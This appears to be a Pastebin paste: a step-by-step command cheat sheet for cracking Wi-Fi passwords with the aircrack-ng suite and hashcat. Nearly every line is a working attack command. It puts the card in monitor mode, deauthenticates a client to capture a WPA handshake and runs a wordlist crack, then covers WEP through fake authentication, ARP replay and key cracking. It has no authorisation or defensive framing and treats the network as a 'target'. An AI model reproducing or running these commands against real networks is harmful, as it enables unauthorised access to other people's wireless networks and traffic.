Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # List Interfaces
- airmon-ng
- # Start Monitor
- airmon-ng start wlan0
- # Optional: Start Monitor in Channel Specific (9)
- airmon-ng start wlan0 9
- # New device shows up in iwconfig, note it and use it
- iwconfig
- # See surrounding wifi
- airodump-ng mon0
- # Find target with data and clients, note channel and both bssid/ssid, write to filename
- airodump-ng -c 9 --bssid 00:00:00:00:00:00 -w filename mon0
- # For WPA, you will need to deauth a client and capture handshake
- # -a is bssid of router, -c is client/target
- aireplay-ng -0 1 -a 00:00:00:00:00:00 -c 00:00:00:00:00:00 mon0
- # Now crack it with a wordlist, -b is router bssid
- aircrack-ng -w password.lst -b 00:00:00:00:00:00 filename*.cap
- # For WEP you need to test with:
- # -e is SSID name, -a is target BSSID
- aireplay-ng -9 -e targetSSID -a 00:14:6C:7E:40:80 mon9
- # output on last line should be 100% or really high
- # otherwise you are too far away
- # Start Airodump like above
- airodump-ng -c 9 --bssid 00:00:00:00:00:00 -w filename mon0
- # Start fake auth attack
- aireplay-ng -1 0 -e targetSSID -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
- # -a is target BSSID, -h is our mac
- # Variation if that doesn't work
- aireplay-ng -1 6000 -o 1 -q 10 -e targetSSID -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
- # Replay the ARP request
- # -b is target BSSID, -h is our mac
- aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
- # And crack that ass, -b is target BSSID
- aircrack-ng -b 00:14:6C:7E:40:80 filename*.cap
- # How to crack better:
- # cuda - nvidia
- # ocl - ati
- # hashcat - windows
- aircrack-ng filename.cap -J filename.hccap
- hashcat64.exe -m 2500 filename.hccap dictionary.lst
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
